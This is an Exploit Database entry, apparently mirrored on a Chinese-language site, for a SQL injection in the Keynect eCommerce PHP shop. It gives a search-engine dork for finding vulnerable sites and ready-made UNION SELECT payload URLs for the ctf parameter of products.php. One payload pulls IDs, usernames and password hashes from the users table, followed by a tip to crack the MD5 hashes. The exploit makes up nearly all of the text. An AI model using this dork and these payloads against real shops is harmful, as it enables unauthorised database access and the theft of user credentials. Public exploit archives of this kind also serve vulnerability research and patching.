Keynect eCommerce – SQL Injection

• Exploit Database
• 109 阅读

• 作者： Arturo Zamora
  日期： 2011-03-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16954/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

  ======================================================================================== | # Title: SQL Injection Keynect Ecommerce | | # Author : Arturo Zamora | | # email: Arturo_zamora_c@hotmail.com | | # DAte : 10/03/2011| | # Verified : yes | | # Risk : High| | # Published: | | # Script : Powered by Keynect Ecommerce SHop http://www.keynect.co.uk/ | | # Dork : inurl:products.php?ctf= | | # Tested on: Windows Xp| ====================== zeux0r 2011 ================================= Exploit: ======================   http://localhost.com//products.php?ctf={sqli}     ====================== example: ======================   http://localhost.com/products.php?ctf=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+information_schema.tables--     http://localhost.com/products.php?ctf=-1+union+select+0,1,2,3,4,5,6,concat%28ID,username,password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users     ====================== Information : ======================   password decrypt md5 ====================== I Love U Pumosita   ================================ Mexican shotos======================================== Greetz : all my friend * zer0-zo0rg * Bucio * Klanx * Xoxonaizer * GothicX * Duuf * Murder etc -------------------------------------------------------------------------------------------